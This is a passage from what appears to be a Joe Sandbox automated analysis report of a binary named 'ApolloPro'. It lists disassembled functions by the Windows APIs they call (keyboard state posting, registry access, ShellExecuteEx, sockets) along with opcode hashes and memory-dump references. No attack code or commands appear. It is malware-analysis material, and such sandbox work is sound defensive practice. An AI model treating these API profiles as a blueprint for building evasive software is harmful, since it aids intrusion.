                                                                                              • Opcode ID: 0675cdaadfcc5abb57b1b3765e7d04b2bd5fc5e98feb75765c071a31b0b6cfd7
                                                                                              • Instruction ID: 6577a12756148c6b61a22c1ce721e6e6b0876818d2f49589b1259a81c97b8dab
                                                                                              • Opcode Fuzzy Hash: 0675cdaadfcc5abb57b1b3765e7d04b2bd5fc5e98feb75765c071a31b0b6cfd7
                                                                                              • Instruction Fuzzy Hash: E70162F2900348BFFB519BA09D89EF6776EE708301F400596BB49E2141EA749E858B75
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 006BDB42
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 006BDB62
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006BDD9D
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006BDDBB
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006BDDDC
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 006BDDFB
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 006BDE20
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 006BDE43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-0
                                                                                              • Opcode ID: 644d2bc78430758b9ae7687d148be48433b4de616c4348ff8339affd1d2615b2
                                                                                              • Instruction ID: cff08de98205395d6435d5764061f6d6a4b3f41f140febf74ecd005bc2ae925e
                                                                                              • Opcode Fuzzy Hash: 644d2bc78430758b9ae7687d148be48433b4de616c4348ff8339affd1d2615b2
                                                                                              • Instruction Fuzzy Hash: B9B178B1600215EBDF14CF69C985BFD7BB2BF44701F088069EC48AE295E775A991CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B044E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3479070676-0
                                                                                              • Opcode ID: 76097c757d9a1da9436acfbc0584076b9187bfa25459daa533ff32cbbfa3e7d4
                                                                                              • Instruction ID: 0c19eb11438ae138169c005b6efc153219bfe6d906907e2e939a69374bf6cf7a
                                                                                              • Opcode Fuzzy Hash: 76097c757d9a1da9436acfbc0584076b9187bfa25459daa533ff32cbbfa3e7d4
                                                                                              • Instruction Fuzzy Hash: C2A1AD70204201DFDB50EF24C895FAEBBE6AF84314F14891CF5968B292DB35E985CF46
                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 00632E9F
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000,000000FF), ref: 00632EE7
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 0066C55B
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0066C508,00000004,00000000,00000000,00000000), ref: 0066C5C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: b59b1f00a7850bfa6464392a3c7bb53a0bacfe9aef41597afcefb762f5c59691
                                                                                              • Instruction ID: 3d6bbfe7ffa08dd51a12ece17c795dafecd5b2ed4ee39516c2584970cb72d645
                                                                                              • Opcode Fuzzy Hash: b59b1f00a7850bfa6464392a3c7bb53a0bacfe9aef41597afcefb762f5c59691
                                                                                              • Instruction Fuzzy Hash: 1C411A30608B82DED7358B29CCAABBA7B93EB81310F24440DE49746761C770F851D7A0
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 006B6810
                                                                                              • GetDC.USER32(00000000), ref: 006B6818
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B6823
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 006B682F
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006B686B
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006B687C
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006B964F,?,?,000000FF,00000000,?,000000FF,?), ref: 006B68B6
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006B68D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: 27c694781a4e50431d9e6e85b964a89049899d555c83c895147948dab1e4bf6b
                                                                                              • Instruction ID: 38f8269d456834d04fe5985f714581dbd3561a47a415493d33b77a329c579ba8
                                                                                              • Opcode Fuzzy Hash: 27c694781a4e50431d9e6e85b964a89049899d555c83c895147948dab1e4bf6b
                                                                                              • Instruction Fuzzy Hash: 74316D72201214BFEB118F50CC4AFFA3BAAEB49761F044065FE089A291C6759851CB74
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: c9fddb5a10a5e71c1c8c2683c8ef81a092f1135692fcd4ad43db7b346903d7e2
                                                                                              • Instruction ID: fd6f87ce95cbe76a791733b6eec1474bdc064697d7294d18143fb9e8b6212422
                                                                                              • Opcode Fuzzy Hash: c9fddb5a10a5e71c1c8c2683c8ef81a092f1135692fcd4ad43db7b346903d7e2
                                                                                              • Instruction Fuzzy Hash: 3E21D7B26416157AD20475219D82FFF376FDE257A4F044228FD06AA342E730DE1587B5
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • _wcstok.LIBCMT ref: 0069F2D7
                                                                                              • _wcscpy.LIBCMT ref: 0069F366
                                                                                              • _memset.LIBCMT ref: 0069F399
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 774024439-3081909835
                                                                                              • Opcode ID: 05d1187eb966820238598351034d68af7980f4eccb91f4972c7eb84cee0157bf
                                                                                              • Instruction ID: b767035906b1aec9ef1dd9c62745009483bd38918fdf3de10a0f589d689b424d
                                                                                              • Opcode Fuzzy Hash: 05d1187eb966820238598351034d68af7980f4eccb91f4972c7eb84cee0157bf
                                                                                              • Instruction Fuzzy Hash: 13C19F715043419FCB54EF64C881A9AB7EABF85310F01492DF899CB7A2DB30ED45CB86
                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006A72EB
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006A730C
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A731F
                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 006A73D5
                                                                                              • inet_ntoa.WSOCK32(?), ref: 006A7392
                                                                                                • Part of subcall function 0068B4EA: _strlen.LIBCMT ref: 0068B4F4
                                                                                                • Part of subcall function 0068B4EA: _memmove.LIBCMT ref: 0068B516
                                                                                              • _strlen.LIBCMT ref: 006A742F
                                                                                              • _memmove.LIBCMT ref: 006A7498
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3619996494-0
                                                                                              • Opcode ID: a18b0065eab77975574609d9bb7c2b575ee6d23f23a1918557923e44ffd56a8f
                                                                                              • Instruction ID: c18c8317c91b32ee479cc9bff59e5ecbca6b77eabeae470e2405d855e6ee6c0a
                                                                                              • Opcode Fuzzy Hash: a18b0065eab77975574609d9bb7c2b575ee6d23f23a1918557923e44ffd56a8f
                                                                                              • Instruction Fuzzy Hash: 7881CE71508200ABD750EB24DC82F6BB7EAEF89714F14461CF9569B292DB70ED01CBA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58d61e663b0fb658cec48cf45d3b2ca42dea70cd385a22cf0092875a6b0bf815
                                                                                              • Instruction ID: 6e4bce763edd2d26fe25149330dbba07c6c1bba0cb20120ee1a3248f3dda217c
                                                                                              • Opcode Fuzzy Hash: 58d61e663b0fb658cec48cf45d3b2ca42dea70cd385a22cf0092875a6b0bf815
                                                                                              • Instruction Fuzzy Hash: 91714C70900109EFDB14DF98CC89EFEBB7AFF86314F148159F915AA251C734AA52CBA4
                                                                                              APIs
                                                                                              • IsWindow.USER32(00DD52C0), ref: 006BBA5D
                                                                                              • IsWindowEnabled.USER32(00DD52C0), ref: 006BBA69
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 006BBB4D
                                                                                              • SendMessageW.USER32(00DD52C0,000000B0,?,?), ref: 006BBB84
                                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 006BBBC1
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000EC), ref: 006BBBE3
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006BBBFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: 3f07066c0d6fccacf70c4ab7d248f2624bbedb7279178a07507b8574b9690915
                                                                                              • Instruction ID: a266641277b9d082ed3b494e45a688df10f2672dc1c94c07f46ce98ec9fc4212
                                                                                              • Opcode Fuzzy Hash: 3f07066c0d6fccacf70c4ab7d248f2624bbedb7279178a07507b8574b9690915
                                                                                              • Instruction Fuzzy Hash: 9771AEB4A04204AFEB20DF54C894FFABBBBEF49300F146059E95597365CBB1AC91CB60
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006AFB31
                                                                                              • _memset.LIBCMT ref: 006AFBFA
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 006AFC3F
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 006AFCB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006AFCE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3522835683-2766056989
                                                                                              • Opcode ID: 70ff32382e17526369457b0696bcb6c0a4e2faec25bd144a3c1b38e38341229e
                                                                                              • Instruction ID: 66d8b11ea567d2bb6a32249c2e6adedc4288cdcd916467207fa130e608416dae
                                                                                              • Opcode Fuzzy Hash: 70ff32382e17526369457b0696bcb6c0a4e2faec25bd144a3c1b38e38341229e
                                                                                              • Instruction Fuzzy Hash: A1618974A006199FCB14EFA4C891AAEB7F6FF49320F10846DE806AB351CB30AD41CF95
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0069178B
                                                                                              • GetKeyboardState.USER32(?), ref: 006917A0
                                                                                              • SetKeyboardState.USER32(?), ref: 00691801
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0069182F
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0069184E
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00691894
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006918B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 0846c56d140ece9ac9f95a16d4c832f062cee49b4b2b167a23ea89670caef0f8
                                                                                              • Instruction ID: 2224250841ce7f0d0a35a2e24769a99415343a938ae616b4a01fc6cd08a65380
                                                                                              • Opcode Fuzzy Hash: 0846c56d140ece9ac9f95a16d4c832f062cee49b4b2b167a23ea89670caef0f8
                                                                                              • Instruction Fuzzy Hash: F151D2A0A087D73EFF3646648815BFA7EEF5B07300F288589E0D94DDD2C298AC85E750
                                                                                              APIs
                                                                                              • GetParent.USER32(00000000), ref: 006915A4
                                                                                              • GetKeyboardState.USER32(?), ref: 006915B9
                                                                                              • SetKeyboardState.USER32(?), ref: 0069161A
                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00691646
                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00691663
                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006916A7
                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006916C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 35d3a74bc04b59929a5433ca550bb1b1e4d0894b5e78f9997a706229aa7a0456
                                                                                              • Instruction ID: 6d3ee88d6072f587d15c66a30ed6c82e3da08b518aa3b122aee1e287d78c30c5
                                                                                              • Opcode Fuzzy Hash: 35d3a74bc04b59929a5433ca550bb1b1e4d0894b5e78f9997a706229aa7a0456
                                                                                              • Instruction Fuzzy Hash: 2A51C2A0A046D73DFF3287648C55BBA7EAE5B07300F2C8589E1D54EEC2C694AC99E750
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 2945705084-0
                                                                                              • Opcode ID: 529ba13e42b2d8350799925bb13e137ed38f84b333ac0376d424fab9ae24f8a8
                                                                                              • Instruction ID: db0c6871ce9f731f3339f9ee762df74272ba2195ad8398433c5923de7f559d31
                                                                                              • Opcode Fuzzy Hash: 529ba13e42b2d8350799925bb13e137ed38f84b333ac0376d424fab9ae24f8a8
                                                                                              • Instruction Fuzzy Hash: 724193A6C1062975CB51EBB4CC469CFB3BE9F05311F50485AF909E3211EA34A759C3AE
                                                                                              APIs
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00693B8A,?), ref: 00694BE0
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00693B8A,?), ref: 00694BF9
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00693BAA
                                                                                              • _wcscmp.LIBCMT ref: 00693BC6
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00693BDE
                                                                                              • _wcscat.LIBCMT ref: 00693C26
                                                                                              • SHFileOperationW.SHELL32(?), ref: 00693C92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1377345388-1173974218
                                                                                              • Opcode ID: 40977615fbcac3a0b6bb1e3880fb566fb0269e6c3a82454a2247507d5bd05665
                                                                                              • Instruction ID: 0a0e3c5faea7916152c8225ca2ab55a48784cf57642c37fce6f007944e9306b0
                                                                                              • Opcode Fuzzy Hash: 40977615fbcac3a0b6bb1e3880fb566fb0269e6c3a82454a2247507d5bd05665
                                                                                              • Instruction Fuzzy Hash: DD41B17140C3459ACB92EF64C481AEFB7EDAF89340F40196EF489C3251EB34D689C756
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006B78CF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B7976
                                                                                              • IsMenu.USER32(?), ref: 006B798E
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B79D6
                                                                                              • DrawMenuBar.USER32 ref: 006B79E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 3866635326-4108050209
                                                                                              • Opcode ID: dcacb1de0f6b37b53069b5805886643e8827cf5d5f7c7abee71597ce723e5b0a
                                                                                              • Instruction ID: f8ed2ade91005df642a3de5d59bf842ab8d03c82370c2f1e3c028e503adff816
                                                                                              • Opcode Fuzzy Hash: dcacb1de0f6b37b53069b5805886643e8827cf5d5f7c7abee71597ce723e5b0a
                                                                                              • Instruction Fuzzy Hash: 3F4117B5A08249EFDB10EF54D884EEABBBAFB45350F048129F9559B350D770AD90CFA0
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006B1631
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B165B
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 006B1712
                                                                                                • Part of subcall function 006B1602: RegCloseKey.ADVAPI32(?), ref: 006B1678
